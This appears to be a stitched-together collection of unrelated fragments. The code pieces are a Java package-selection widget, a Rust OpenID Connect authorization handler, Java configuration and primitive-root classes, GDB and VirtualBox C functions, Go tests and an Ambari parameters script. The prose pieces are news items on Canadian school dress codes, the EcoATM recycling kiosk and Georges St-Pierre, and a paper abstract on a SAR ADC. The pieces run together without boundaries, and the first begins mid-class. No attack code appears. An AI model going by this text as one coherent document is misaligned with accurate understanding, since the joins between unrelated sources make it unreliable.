        super(parent, style, resources, element);
        this.filterItem = element;
        this.item = element.getPackage();
        createContent();
    }

    @Override
    protected void refresh() {
    }

    private void createContent() {
        GridLayout layout = new GridLayout(3, false);
        layout.marginLeft = 7;
        layout.marginTop = 2;
        layout.marginBottom = 2;
        setLayout(layout);

        nameLabel = new Label(this, SWT.NONE);
        GridDataFactory.fillDefaults().grab(true, false).span(3, 1).align(SWT.BEGINNING, SWT.CENTER).applyTo(nameLabel);
        nameLabel.setFont(resources.getSmallHeaderFont());
        nameLabel.setText(item.getName());

        description = new Label(this, SWT.NULL | SWT.WRAP);
        GridDataFactory.fillDefaults().grab(true, false).span(3, 1)/*.indent(45, 0).hint(100, SWT.DEFAULT)*/.applyTo(description);

        String descriptionText = item.getDescription();
        int maxDescriptionLength = 162;
        if (descriptionText == null) {
            descriptionText = ""; //$NON-NLS-1$
        }
        if (descriptionText.length() > maxDescriptionLength) {
            descriptionText = descriptionText.substring(0, maxDescriptionLength);
        }
        description.setText(descriptionText.replaceAll("(\\r\\n)|\\n|\\r", " ")); //$NON-NLS-1$ //$NON-NLS-2$

        createStatsPart();
        initializeListeners();
        initState();
    }

    protected void initState() {
        if (filterItem.isChecked()) {
            setBackground(resources.getGradientEndColor());
            if (filterItem.getVersions() != null) {
                loadVersionsFromCache();
            } else {
                loadVersionCombo();
            }
        } else {
            versionCombo.setVisible(false);
        }
    }

    protected void createStatsPart() {
        favorButton = new Button(this, SWT.PUSH);
        favorButton.setToolTipText("Favorites on packagist.org");
        favorButton.setLayoutData(new GridData(SWT.LEFT, SWT.CENTER, false, false));
        favorButton.setImage(ComposerUIPluginImages.STAR.createImage());
        GridDataFactory.swtDefaults().align(SWT.CENTER, SWT.CENTER).span(1, 2).applyTo(favorButton);

        downloadButton = new Button(this, SWT.TOGGLE);
        downloadButton.setToolTipText("Select this package for your new project.");
        if (filterItem.isChecked()) {
            downloadButton.setSelection(true);
        }
        GridDataFactory.swtDefaults().align(SWT.BEGINNING, SWT.CENTER).span(1, 2).applyTo(downloadButton);

        JsonValue downloads = item.get("downloads");
        JsonValue favorites = item.get("favers");

        if (downloads != null && favorites != null) {
            Number number = downloads.getAsNumber();
            // Locale.US is a well-formed locale; new Locale("en_US") would create
            // an invalid "en_us" language tag.
            DecimalFormat formatter = (DecimalFormat) NumberFormat.getInstance(Locale.US);
            DecimalFormatSymbols symbols = formatter.getDecimalFormatSymbols();
            symbols.setGroupingSeparator(' ');
            // getDecimalFormatSymbols() returns a copy, so the modified symbols
            // must be set back on the formatter to take effect.
            formatter.setDecimalFormatSymbols(symbols);
            downloadButton.setText(formatter.format(number));
            downloadButton.setImage(ComposerUIPluginImages.DOWNLOAD.createImage());
            favorButton.setText("" + favorites.getAsNumber());
        }

        versionCombo = new Combo(this, SWT.READ_ONLY);
        GridDataFactory.fillDefaults().align(SWT.END, SWT.CENTER).span(1, 2).hint(200, SWT.DEFAULT).applyTo(versionCombo);
    }

    protected void initializeListeners() {
        downloadButton.addSelectionListener(new SelectionAdapter() {
            public void
widgetSelected(SelectionEvent e) { boolean selected = downloadButton.getSelection(); filterItem.setChecked(selected); for (PackageFilterChangedListener listener : listeners) { listener.filterChanged(filterItem); } } }); favorButton.addSelectionListener(new SelectionAdapter() { @Override public void widgetSelected(SelectionEvent e) { try { final IWebBrowser browser = PlatformUI.getWorkbench().getBrowserSupport().createBrowser(null); browser.openURL(new URL(item.getAsString("url"))); } catch (Exception e1) { Logger.logException(e1); } } }); versionCombo.addSelectionListener(new SelectionAdapter() { @Override public void widgetSelected(SelectionEvent e) { filterItem.setSelectedVersion(versionCombo.getText()); for (PackageFilterChangedListener listener : listeners) { listener.filterChanged(filterItem); } } }); } protected void loadVersionsFromCache() { versionCombo.setItems(filterItem.getVersions()); versionCombo.select(0); versionCombo.setVisible(true); filterItem.setSelectedVersion(versionCombo.getText()); for (PackageFilterChangedListener listener : listeners) { listener.filterChanged(filterItem); } } protected void loadVersionCombo() { versionCombo.setItems(new String[]{"Loading versions..."}); versionCombo.select(0); AsyncPackagistDownloader dl = new AsyncPackagistDownloader(); dl.addPackageListener(new PackageListenerInterface() { @Override public void errorOccured(Exception e) { isLoadingVersions = false; } @Override public void aborted(String url) { isLoadingVersions = false; } @Override public void packageLoaded(RepositoryPackage repositoryPackage) { Versions versions = repositoryPackage.getVersions(); final List<String> versionNames = new ArrayList<String>(); for (Entry<String, ComposerPackage> version : versions) { versionNames.add(version.getValue().getVersion()); } getDisplay().asyncExec(new Runnable() { @Override public void run() { filterItem.setVersions(versionNames.toArray(new String[versionNames.size()])); loadVersionsFromCache(); } }); isLoadingVersions = false; } }); dl.loadPackage(item.getName()); isLoadingVersions = true; } public void addFilterChangedListener(PackageFilterChangedListener listener) { if (!listeners.contains(listener)) { listeners.add(listener); } } }
Amid the uproar across Canada over student dress codes, school administrators came to the defence of such rules on Wednesday, saying they are not meant to stifle creativity or be sexist. Standards are needed for safety reasons and to prevent clothes from becoming a distraction in the classroom, officials said. Such rules also prepare students for the working world. “Principals are doing their very best to ensure they are providing a policy that tries to account for both social growth and movement and traditional values that people hold near and dear,” said Tina Estabrooks, president of the Canadian Association of Principals and the principal of an elementary school in Saint John, N.B. Dress code policies have become a flashpoint in school districts in Ontario and the Maritimes in recent weeks. Dozens of students at A.B. Lucas Secondary School in London, Ont., rallied Wednesday in support of Grade 12 student Laura Anderson, who was sent home earlier this week after wearing a loose-fitting, sleeveless top and ripped jeans to school. An online petition said the school’s dress code is premised on the “outdated” notion that female students should “cover up” because they could distract male students. “The sexualization of a teenage girl’s body is not her problem, it is the problem of those who choose to sexualize a 17-year-old’s body,” the petition said. Sheila Powell, superintendent at the Thames Valley School District, said that part of the reason Anderson’s attire was deemed inappropriate was because an undergarment was showing. While educators are not trying to be the fashion police and want students to express themselves, students also have to learn there are limits, Powell said. The rules aren’t just addressing clothes that are too revealing but clothes that might contain racist or hateful language. Most workplaces have such expectations, she said. On Tuesday, scores of students showed up at the Etobicoke School of the Arts in Toronto wearing midriff-baring crop tops in support of Alexi Halket, 18, who was called to the principal’s office for wearing a grey skirt and black and turquoise top that resembled a sports bra. “First of all, what’s wrong with a sports bra?” Halket wrote on Facebook. “It does its job of covering boobs, and why is SKIN perceived as ‘inappropriate.’ That only means that it’s seen as sexual or provocative, and teachers shouldn’t be making those observations about students.” Earlier this month, Lauren Wiggins, 17, a student at Harrison Trimble High School in Moncton, N.B., took to social media after officials deemed the full-length halter dress she was wearing — which revealed her shoulders, upper back tattoo and bra strap — to be inappropriate. “Enough is enough. I’m tired of the unjust standards that we as women are held up to,” Wiggins wrote on Facebook. Last year, Kate Winn, an Ontario Catholic elementary school teacher and mother behind the This Mom Loves blog, wrote that she explained to her students that “it demonstrates modesty” to have certain body parts covered up more than others. “Do parents fight (the) fact that Tim Hortons has the nerve to tell their child what to wear?” Janet Foord, president of the Canadian School Boards Association, said some school officials have dress codes to address disparities between students. “There’s always competition with kids with clothing. It’s a status thing,” Foord said. “Having a dress code brings some equity for families in poverty situations.” But the opposition is growing louder. 
Whereas students may have grumbled quietly in the past, we’re now seeing a surge in political activism, likely the result of high-profile cases surrounding sexual harassment and gender discrimination, said Shauna Pomerantz, a professor of child and youth studies at Brock University. Pomerantz said the language in dress codes can be insulting to young women because they suggest they are “asking for it” and unable to think for themselves. They’re also insulting to young men because they suggest they have no control over their “raging hormones.” If schools want to address problems surrounding sexual harassment, then have a frank discussion about respecting bodies, she said. “If you ask me, high school is not only a place of learning, but a place to experiment with identity.” National Post • Email: [email protected] | Twitter: dougquan
use super::OauthError;
use crate::core::{error::AppError, AppState};
use actix_session::Session;
use actix_web::http::header::LOCATION;
use actix_web::http::StatusCode;
use actix_web::web::{Data, Form, Query};
use actix_web::Error;
use actix_web::{HttpResponse, Responder, Result};
use std::collections::HashSet;

/// GET /authorize
pub async fn auth_get((data, state, session): (Query<AuthParams>, Data<AppState>, Session)) -> impl Responder {
    handle_auth(&data, &state, &session)
}

/// POST /authorize
pub async fn auth_post((data, state, session): (Form<AuthParams>, Data<AppState>, Session)) -> impl Responder {
    handle_auth(&data, &state, &session)
}

// common ground
fn handle_auth(data: &AuthParams, state: &Data<AppState>, session: &Session) -> Result<HttpResponse> {
    info!("auth({:?})", data);
    session.clear();
    match validate_auth(data, state)? {
        Some(e) => Ok(HttpResponse::Found()
            .header(LOCATION, callback_error(data, e)?)
            .finish()),
        None => {
            set_on_session(data, session)?;
            state.send_page(StatusCode::OK, "login.html", tera::Context::new())
        }
    }
}

// @see https://openid.net/specs/openid-connect-core-1_0.html#AuthRequest
#[derive(Deserialize, Debug, Clone)]
pub struct AuthParams {
    pub scope: Option<String>,
    pub response_type: Option<String>,
    pub client_id: Option<String>,
    pub redirect_uri: Option<String>,
    pub state: Option<String>, // RECOMMENDED
    pub response_mode: Option<String>,
    pub nonce: Option<String>,
    pub display: Option<String>,
    pub prompt: Option<String>,
    pub max_age: Option<String>,
    pub ui_locales: Option<String>,
    pub id_token_hint: Option<String>,
    pub login_hint: Option<String>,
    pub acr_values: Option<String>,
}

/// validates, extracts the info & puts it on the session
/// https://openid.net/specs/openid-connect-core-1_0.html#AuthError
fn validate_auth(data: &AuthParams, state: &AppState) -> Result<Option<OauthError>, AppError> {
    if data.redirect_uri.is_none() {
        return Err(AppError::bad_req("'redirect_uri' is required"));
    }
    let redirect_uri = data.redirect_uri.as_ref().unwrap();
    if redirect_uri.is_empty() {
        return Err(AppError::bad_req("'redirect_uri' is required"));
    }
    if data.response_type.is_none() {
        return Ok(Some(OauthError::new("invalid_request", "response_type is required.")));
    }
    let response_type = data.response_type.as_ref().unwrap();
    if !contains(&RESPONSE_TYPES, response_type.as_ref()) {
        //if !RESPONSE_TYPES.iter().any(|x| x == &data.response_type) {
        return Ok(Some(OauthError::new("invalid_request", "invalid 'response_type'")));
    }
    if response_type != "code" {
        return Ok(Some(OauthError::of("unsupported_response_type"))); // TODO
    }
    // TODO: is this response_type allowed for the client?
    if data.client_id.is_none() {
        return Ok(Some(OauthError::new("invalid_request", "'client_id' is required")));
    }
    let client_id = data.client_id.as_ref().unwrap();
    let client = state
        .oauth_db
        .fetch_client_config(&client_id)
        .map_err(|_| AppError::bad_req("Unknown or invalid client_id"))?;
    let callback_urls = client.callback_urls().map_err(|_| AppError::InternalError)?;
    if !callback_urls.contains(&redirect_uri) {
        return Err(AppError::bad_req("'redirect_uri' is invalid"));
    }
    if data.scope.is_some() {
        let scope_param = data.scope.as_ref().unwrap();
        let scopes: HashSet<&str> = scope_param.split_whitespace().collect();
        if !scopes.contains("openid") {
            // we only support oidc atm
            return Ok(Some(OauthError::new("invalid_request", "scope expected")));
        }
        // only client configured scopes are allowed
        let client_scopes: HashSet<&str> = client.allowed_scopes.split_whitespace().collect();
        if (&scopes - &client_scopes).len() > 0 {
            return Ok(Some(OauthError::new("invalid_scope", "scope not allowed")));
        }
    }
    if data.acr_values.is_some() {
        return Ok(Some(OauthError::new("invalid_request", "invalid acr_value")));
    }
    // TODO! support: "prompt" "display" "ui_locales claims_locales" "auth_time" "max_age" "acr_values"
    // TODO validate
    debug!("no error found");
    Ok(None)
}

fn set_on_session(data: &AuthParams, session: &Session) -> Result<(), Error> {
    session.set("client_id", &data.client_id)?;
    session.set("scopes", &data.scope)?;
    session.set("redirect_uri", &data.redirect_uri)?;
    if data.nonce.is_some() {
        session.set("nonce", data.nonce.as_ref().unwrap())?;
    }
    if data.state.is_some() {
        session.set("state", data.state.as_ref().unwrap())?;
    }
    Ok(())
}

static RESPONSE_TYPES: [&'static str; 8] = [
    "code",
    "token",
    "id_token",
    "id_token token",
    "code id_token",
    "code token",
    "code id_token token",
    "none",
];

pub fn contains<T: PartialEq + AsRef<str>>(col: &[T], item: T) -> bool {
    col.iter().any(|x| &item == x)
}

fn callback_error(data: &AuthParams, err: OauthError) -> Result<String> {
    use std::collections::HashMap;
    use url::Url;
    info!("{:?}", err);
    // add the code to the callback URL and return it
    let mut params: HashMap<&str, &str> = HashMap::new();
    params.insert("error", &err.error);
    if err.error_description.is_some() {
        params.insert("error_description", err.error_description.as_ref().unwrap());
    }
    if data.state.is_some() {
        params.insert("state", data.state.as_ref().unwrap());
    }
    let callback_url = Url::parse_with_params(data.redirect_uri.as_ref().unwrap(), params).unwrap();
    Ok(callback_url.to_string())
}
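// A small sanity test for the `contains` helper above (the test-module layout
// is a sketch, not part of the original file):
//
// #[cfg(test)]
// mod tests {
//     use super::contains;
//
//     #[test]
//     fn contains_matches_exact_entries() {
//         let col = ["code", "token", "none"];
//         assert!(contains(&col, "code"));
//         assert!(!contains(&col, "id_token"));
//     }
// }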
A 0.56-mW 63.6-dB SNDR 250-MS/s Two-Step SAR ADC in 8-nm FinFET

This letter presents a two-step SAR ADC that uses coarse and fine comparators, each with dedicated SAR logic and an asynchronous clock generator, to increase energy efficiency by optimizing the comparators and reducing the output loading of the comparators and the asynchronous clock generators. The relative offset of the two comparators is calibrated by redundancy-based offset detection and an input-transistor-transconductance-controlled offset correction method without compromising power. A constant-impedance skewed inverter saves reference current with low short-circuit current, without additional CDAC settling time or logic. The ADC is fabricated in an 8-nm FinFET process and achieves 63.6-dB SNDR at 250 MS/s while consuming 0.56 mW, resulting in a Walden FoM of 1.81 fJ/conversion-step.
/** Called by pipelines after they've modified the individual and it might need to be "fixed" -- basically a hook for you to override. By default, calls validateRules on each ruleset. */ public void postprocessIndividual(final EvolutionState state, final int thread) { for (int x=0;x<rulesets.length;x++) rulesets[x].postprocessRules(state,thread); }
/**
 * Defines per-space configuration properties for {@link GridH2IndexingSpi}.
 */
public class GridH2IndexingSpaceConfiguration {
    /** */
    private String name;

    /** */
    private boolean idxPrimitiveKey;

    /** */
    private boolean idxPrimitiveVal;

    /** */
    private boolean idxFixedTyping;

    /** */
    private boolean escapeAll;

    /**
     * Gets space name to which this configuration applies.
     *
     * @return Space name.
     */
    public String getName() {
        return name;
    }

    /**
     * Sets space name.
     *
     * @param name Space name.
     */
    public void setName(String name) {
        this.name = name;
    }

    /**
     * Gets flag indicating whether indexing SPI should index by key in cases
     * where key is of primitive type.
     *
     * @return {@code True} if primitive keys should be indexed.
     */
    public boolean isIndexPrimitiveKey() {
        return idxPrimitiveKey;
    }

    /**
     * Sets flag indicating whether indexing SPI should index by key in cases
     * where key is of primitive type.
     *
     * @param idxPrimitiveKey {@code True} if primitive keys should be indexed.
     */
    public void setIndexPrimitiveKey(boolean idxPrimitiveKey) {
        this.idxPrimitiveKey = idxPrimitiveKey;
    }

    /**
     * Gets flag indicating whether indexing SPI should index by value in cases
     * where value is of primitive type.
     *
     * @return {@code True} if primitive values should be indexed.
     */
    public boolean isIndexPrimitiveValue() {
        return idxPrimitiveVal;
    }

    /**
     * Sets flag indicating whether indexing SPI should index by value in cases
     * where value is of primitive type.
     *
     * @param idxPrimitiveVal {@code True} if primitive values should be indexed.
     */
    public void setIndexPrimitiveValue(boolean idxPrimitiveVal) {
        this.idxPrimitiveVal = idxPrimitiveVal;
    }

    /**
     * This flag essentially controls whether all values of the same type have
     * identical key type.
     * <p>
     * If {@code false}, SPI will store all keys in BINARY form to make it possible to store
     * the same value type with different key types. If {@code true}, key type will be converted
     * to respective SQL type if it is possible, hence, improving performance of queries.
     * <p>
     * Setting this value to {@code false} also means that {@code '_key'} column cannot be indexed and
     * cannot participate in query where clauses. The behavior of using '_key' column in where
     * clauses with this flag set to {@code false} is undefined.
     *
     * @return {@code True} if SPI should try to convert values to their respective SQL
     *      types for better performance.
     */
    public boolean isIndexFixedTyping() {
        return idxFixedTyping;
    }

    /**
     * This flag essentially controls whether key type is going to be identical
     * for all values of the same type.
     * <p>
     * If false, SPI will store all keys in BINARY form to make it possible to store
     * the same value type with different key types. If true, key type will be converted
     * to respective SQL type if it is possible, which may provide a significant performance
     * boost.
     *
     * @param idxFixedTyping {@code True} if SPI should try to convert values to their respective SQL
     *      types for better performance.
     */
    public void setIndexFixedTyping(boolean idxFixedTyping) {
        this.idxFixedTyping = idxFixedTyping;
    }

    /**
     * If {@code true}, then table name and all column names in 'create table' SQL
     * generated by SPI are escaped with double quotes. This flag should be set if a table name or
     * a column name is an H2 reserved word or is not a valid H2 identifier (e.g. contains a space or hyphen).
     * <p>
     * Note that if this flag is set, table and column names in SQL queries must also be escaped with double quotes.
     *
     * @return Flag value.
     */
    public boolean isEscapeAll() {
        return escapeAll;
    }

    /**
     * If {@code true}, then table name and all column names in 'create table' SQL
     * generated by SPI are escaped with double quotes. This flag should be set if a table name or
     * a column name is an H2 reserved word or is not a valid H2 identifier (e.g. contains a space or hyphen).
     * <p>
     * Note that if this flag is set, table and column names in SQL queries must also be escaped with double quotes.
     *
     * @param escapeAll Flag value.
     */
    public void setEscapeAll(boolean escapeAll) {
        this.escapeAll = escapeAll;
    }

    /** {@inheritDoc} */
    @Override public String toString() {
        return S.toString(GridH2IndexingSpaceConfiguration.class, this);
    }
}
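/*
 * A brief configuration sketch (the property values below are illustrative):
 *
 *   GridH2IndexingSpaceConfiguration spaceCfg = new GridH2IndexingSpaceConfiguration();
 *   spaceCfg.setName("partitioned");
 *   spaceCfg.setIndexPrimitiveKey(true);
 *   spaceCfg.setIndexFixedTyping(true);
 *   spaceCfg.setEscapeAll(false);
 */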
/** * This tool can be used to generate a primitive root * for a prime modulus. * * @version 1.0 * @author Mikko Tommila */ public class PrimitiveRoot extends LongModMath { private PrimitiveRoot(long p) { setModulus(p); } public static void main(String[] args) { if (args.length < 1) { System.err.println("Usage: PrimitiveRoot p"); System.err.println(" where p must be prime"); return; } long p = Long.parseLong(args[0]); System.out.println(new PrimitiveRoot(p).findPrimitiveRoot()); } private long findPrimitiveRoot() { long p1 = getModulus() - 1, root = 1; int i; long[] factors = factorize(p1); do { root++; for (i = 0; i < factors.length; i++) { if (modPow(root, p1 / factors[i]) == 1) { break; } } } while (i < factors.length); return root; } private static long[] factorize(long n) { long[] factors = new long[64]; int i; for (i = 0; (n & 1) == 0; i++) { factors[i] = 2; n /= 2; } for (long f = 3; n > 1; f += 2) { for (; n % f == 0; i++) { factors[i] = f; n /= f; } } long[] buffer = new long[i]; System.arraycopy(factors, 0, buffer, 0, i); return buffer; } }
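// Worked example: for p = 257, p - 1 = 256 = 2^8, so the only prime factor is 2
// and a candidate g is a primitive root iff g^128 mod 257 != 1. Since
// 2^16 = 65536 = 255 * 257 + 1, 2 fails the test, while 3 passes, so
//
//   java PrimitiveRoot 257
//
// should print 3 (assuming LongModMath.modPow behaves as standard modular
// exponentiation).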
The EcoATM made its debut last week at the 2012 Consumer Electronics Show, but unlike all the other products that manufacturers hoped you’d throw your hard earned dollars at, this innovative piece of tech wants to give you cash for your gadgets. E-waste is a growing problem with few programs in place with enough incentive to get consumers to properly dispose of their unwanted gadgets, but the EcoATM makes recycling your electronics something to get excited over. Akin to the automated aluminum can and glass recycling kiosks found in supermarkets, the EcoATM uses advanced machine vision, electronic diagnostics, and artificial intelligence to evaluate and buy back your used electronics!

To use the EcoATM, simply drop your gadget into the “mouth” of the machine. From there, the EcoATM will take various pictures of your device to determine what kind of shape it is in. Once that is complete, you will need to plug your piece into one of the many cables attached and the machine will conduct numerous tests to see if your gadget is in working condition. After the evaluation is complete, the EcoATM will pay you what it believes your device is worth based on what other e-recycling companies would be willing to pay for it.

One test conducted by EcoATM founder Bill Bowles found a Verizon iPhone 4 to be worth $221. And while not all electronics will ring up so high, the EcoATM will still offer to take your gadget and give you some dollars for it. So far the EcoATM can only be found in select locations in California, Seattle and the Midwest, but if the process is as seamless as the demonstration suggests, we don’t doubt that it will catch on. Check out a video of it in action above!
/* Simulator memory may be accessed after the program has been loaded. */ static int gdbsim_has_all_memory (struct target_ops *ops) { struct sim_inferior_data *sim_data = get_sim_inferior_data (current_inferior (), SIM_INSTANCE_NOT_NEEDED); if (!sim_data->program_loaded) return 0; return 1; }
// Test that it stops retrying if a 4xx response comes back
func TestGetURL4xx(t *testing.T) {
	client := NewHttpClient()
	retries := 0
	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		retries++
		http.Error(w, "", 404)
	}))
	defer ts.Close()

	_, err := client.GetRetry(ts.URL)
	if err == nil {
		// calling err.Error() here would panic on a nil error
		t.Errorf("expected an error for a 404 response, got nil")
	}
	if retries > 1 {
		t.Errorf("Number of retries:\n%d\nExpected number of retries:\n%d", retries, 1)
	}
}
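// A companion test sketch for the retry path, assuming GetRetry retries on 5xx
// responses (the exact retry limit and backoff are implementation details of
// NewHttpClient not shown here):
//
// func TestGetURL5xxRetries(t *testing.T) {
// 	client := NewHttpClient()
// 	attempts := 0
// 	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// 		attempts++
// 		if attempts < 3 {
// 			http.Error(w, "", 500)
// 			return
// 		}
// 		w.WriteHeader(200)
// 	}))
// 	defer ts.Close()
//
// 	if _, err := client.GetRetry(ts.URL); err != nil {
// 		t.Errorf("expected success after retries, got: %v", err)
// 	}
// 	if attempts < 3 {
// 		t.Errorf("expected at least 3 attempts, got %d", attempts)
// 	}
// }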
/**
 * Handles starting a guest process.
 *
 * @returns VBox status code.
 * @param   pSession    Guest session.
 * @param   pHostCtx    Host context.
 */
static int vgsvcGstCtrlSessionHandleProcExec(PVBOXSERVICECTRLSESSION pSession, PVBGLR3GUESTCTRLCMDCTX pHostCtx)
{
    AssertPtrReturn(pSession, VERR_INVALID_POINTER);
    AssertPtrReturn(pHostCtx, VERR_INVALID_POINTER);

    int rc = VINF_SUCCESS;
    bool fStartAllowed = false;

    switch (pHostCtx->uProtocol)
    {
        case 1:
            if (pHostCtx->uNumParms != 11)
                rc = VERR_NOT_SUPPORTED;
            break;
        case 2:
            if (pHostCtx->uNumParms != 12)
                rc = VERR_NOT_SUPPORTED;
            break;
        default:
            rc = VERR_NOT_SUPPORTED;
            break;
    }

    if (RT_SUCCESS(rc))
    {
        VBOXSERVICECTRLPROCSTARTUPINFO startupInfo;
        RT_ZERO(startupInfo);
        startupInfo.cbEnv = sizeof(startupInfo.szEnv);

        rc = VbglR3GuestCtrlProcGetStart(pHostCtx,
                                         startupInfo.szCmd, sizeof(startupInfo.szCmd),
                                         &startupInfo.uFlags,
                                         startupInfo.szArgs, sizeof(startupInfo.szArgs),
                                         &startupInfo.uNumArgs,
                                         startupInfo.szEnv, &startupInfo.cbEnv,
                                         &startupInfo.uNumEnvVars,
                                         startupInfo.szUser, sizeof(startupInfo.szUser),
                                         startupInfo.szPassword, sizeof(startupInfo.szPassword),
                                         &startupInfo.uTimeLimitMS,
                                         &startupInfo.uPriority,
                                         startupInfo.uAffinity, sizeof(startupInfo.uAffinity),
                                         &startupInfo.uNumAffinity);
        if (RT_SUCCESS(rc))
        {
            VGSvcVerbose(3, "Request to start process szCmd=%s, fFlags=0x%x, szArgs=%s, szEnv=%s, uTimeout=%RU32\n",
                         startupInfo.szCmd, startupInfo.uFlags,
                         startupInfo.uNumArgs ? startupInfo.szArgs : "<None>",
                         startupInfo.uNumEnvVars ? startupInfo.szEnv : "<None>",
                         startupInfo.uTimeLimitMS);

            rc = VGSvcGstCtrlSessionProcessStartAllowed(pSession, &fStartAllowed);
            if (RT_SUCCESS(rc))
            {
                if (fStartAllowed)
                    rc = VGSvcGstCtrlProcessStart(pSession, &startupInfo, pHostCtx->uContextID);
                else
                    rc = VERR_MAX_PROCS_REACHED;
            }
        }
    }

    if (RT_FAILURE(rc))
    {
        VGSvcError("Starting process failed with rc=%Rrc, protocol=%RU32, parameters=%RU32\n",
                   rc, pHostCtx->uProtocol, pHostCtx->uNumParms);
        if (rc != VERR_TOO_MUCH_DATA)
        {
            int rc2 = VbglR3GuestCtrlProcCbStatus(pHostCtx, 0 /* PID */, PROC_STS_ERROR, rc,
                                                  NULL /* pvData */, 0 /* cbData */);
            if (RT_FAILURE(rc2))
                VGSvcError("Error sending start process status to host, rc=%Rrc\n", rc2);
        }
    }

    return rc;
}
BERLIN – While mostly staying away from reporters gathered at a CrossFit gym for this weekend’s UFC Fight Night 41 event in Berlin, Georges St-Pierre gave a small update about the goings-on in his life.

First, St-Pierre, who is in Germany in support of teammate and Saturday combatant Francis Carmont, is still healing from a second torn ACL. He did not give a timetable for when he will be fully cleared to train, but is hopeful about the outcome. “I had the same procedure on my right knee, and my leg came back stronger,” he said. “I will have two good knees, so it will be a good thing.”

In the meantime, the former welterweight champ is watching the sport, including the sudden race near the top between a handful of standout welterweights, from a distance. Robbie Lawler, Matt Brown, Hector Lombard and Dong Hyun Kim are a few of the frontrunners. But St-Pierre, of course, has his eye closer to home. “I’m very happy and very excited, and my friend and training partner Rory MacDonald is part of that group, and I think he is going to be champion,” he said.

Nevertheless, the fighter, who this month turned 33, agrees with UFC President Dana White’s assessment that now is an exciting time to watch 170-pounders fight. “It’s true – it is the most exciting time because they have a lot of different contenders,” St-Pierre said. “It’s a lot of new guys. They’re not veterans. I mean, some of them are veterans that were not there before, so it’s a lot of new faces.”

Johny Hendricks, of course, is the face and champion after St-Pierre vacated the belt. Hendricks outpointed Lawler at UFC 171 in March. Earlier in his career, St-Pierre might have liked to have erased any doubts about his split-decision win over the new champ at this past November’s UFC 167 event. But he is still finding himself after making the decision to take time off from the sport following that fight.

St-Pierre (25-2 MMA, 19-2 UFC) initially said his reasons for stepping away from the sport were personal. As time went on, however, he revealed his issues with the UFC’s drug testing protocol and struggles with obsessive-compulsive disorder (OCD). While he is invested in the welterweight division’s fate, St-Pierre apparently isn’t up to speed on an issue he said was close to his heart. Asked for his thoughts on the random testing funded by the UFC for a recent title fight between light heavyweight champ Jon Jones and Glover Teixeira, he said, “I haven’t followed that.”

Whether he does continue to follow the sport or not, however, he will be asked at every turn when he’ll be back. In previous interviews, he’s teased a comeback. But before this particular group of reporters on a rainy Berlin day, he didn’t have answers about his future – only that his past was something less than comfortable to be avoided.

“I’ve been doing this for a long time, since I was 19,” he said. “I’m 33 now. When I fought (Carlos) Condit, I was very hungry. I was very happy to be there. I wanted to do it a lot. (Nick) Diaz, a little bit less. And the last training camp I had with (Johny) Hendricks, I didn’t have the same motivation. It went down, and I need to get back to that feeling of hunger.

“I need to get the motivation back. It’s hard because it’s always the same routine, the same thing. And I need to fix some things in my life to make it more efficient. Once everything can be done, maybe I’ll come back. We’ll see how it goes.
But I can’t say yes, I can’t say no, because I just don’t know right now.” For more on the UFC’s upcoming schedule, stay tuned to the UFC Rumors section of the site.
/** * Operand to a {@link UnifyRule} that matches a relational expression of a given type. */ private static class AnyOperand extends Operand { AnyOperand( Class<? extends MutableRel> clazz ) { super( clazz ); } @Override public boolean matches( SubstitutionVisitor visitor, MutableRel rel ) { return clazz.isInstance( rel ); } }
// QueryRow executes a query that is expected to return at most one row,
// applying the optimizer to the query and args if one is configured.
// It returns the resulting *sql.Row.
func (d *PlainDB) QueryRow(query string, args ...interface{}) *sql.Row {
	if d.Optimizer != nil {
		query, args = d.Optimizer.MustOptimize(query, args)
	}
	return d.db.QueryRow(query, args...)
}
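// Usage sketch (the table and column names are hypothetical):
//
//   var name string
//   err := d.QueryRow("SELECT name FROM users WHERE id = ?", 42).Scan(&name)
//   if err == sql.ErrNoRows {
//       // no matching row
//   }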
def user_avatars_db(self, user_id: str) -> RtdbNode: return self.avatars_db() / user_id
#!/usr/bin/env python
from resource_management.libraries.script import Script
from resource_management.libraries.functions.default import default
import functools
from resource_management.libraries.functions import get_kinit_path
from resource_management.libraries.resources import HdfsResource
from resource_management.libraries.functions.get_not_managed_resources import get_not_managed_resources

config = Script.get_config()
stack_root = Script.get_stack_root()

install_dir = stack_root + '/xlearning'
download_url = config['configurations']['xlearning-env']['download_url']
filename = download_url.split('/')[-1]
version_dir = filename.replace('.tar.gz', '').replace('.tgz', '')

xlearning_user = config['configurations']['xlearning-env']['xlearning_user']
xlearning_group = user_group = config['configurations']['cluster-env'][
    'user_group']
log_dir = config['configurations']['xlearning-env']['xlearning_log_dir']
xlearning_pid_file = install_dir + '/bin/xlearning.pid'

env_content = config['configurations']['xlearning-env']['env_content']
log_content = config['configurations']['xlearning-env']['log_content']

hostname = config['agentLevelParams']['hostname']
java64_home = config['ambariLevelParams']['java_home']
conf_dir = '/etc/xlearning'
security_enabled = config['configurations']['cluster-env']['security_enabled']

hadoop_home = stack_root + '/hadoop'

# smokeuser
kinit_path_local = get_kinit_path(
    default('/configurations/kerberos-env/executable_search_paths', None))
smokeuser = config['configurations']['cluster-env']['smokeuser']
smokeuser_principal = config['configurations']['cluster-env'][
    'smokeuser_principal_name']
smoke_user_keytab = config['configurations']['cluster-env']['smokeuser_keytab']

hadoop_bin_dir = hadoop_home + '/bin'
# hadoop_conf_dir is derived from hadoop_home (an earlier hard-coded
# '/etc/hadoop' assignment was dead code and has been dropped)
hadoop_conf_dir = hadoop_home + '/etc/hadoop'
hdfs_site = config['configurations']['hdfs-site']
default_fs = config['configurations']['core-site']['fs.defaultFS']
dfs_type = default("/commandParams/dfs_type", "")
hdfs_user = config['configurations']['hadoop-env']['hdfs_user']
hdfs_principal_name = config['configurations']['hadoop-env'][
    'hdfs_principal_name']
hdfs_user_keytab = config['configurations']['hadoop-env']['hdfs_user_keytab']

HdfsResource = functools.partial(
    HdfsResource,
    user=hdfs_user,
    hdfs_resource_ignore_file=
    "/var/lib/ambari-agent/data/.hdfs_resource_ignore",
    security_enabled=security_enabled,
    keytab=hdfs_user_keytab,
    kinit_path_local=kinit_path_local,
    hadoop_bin_dir=hadoop_bin_dir,
    hadoop_conf_dir=hadoop_conf_dir,
    principal_name=hdfs_principal_name,
    hdfs_site=hdfs_site,
    default_fs=default_fs,
    immutable_paths=get_not_managed_resources(),
    dfs_type=dfs_type)
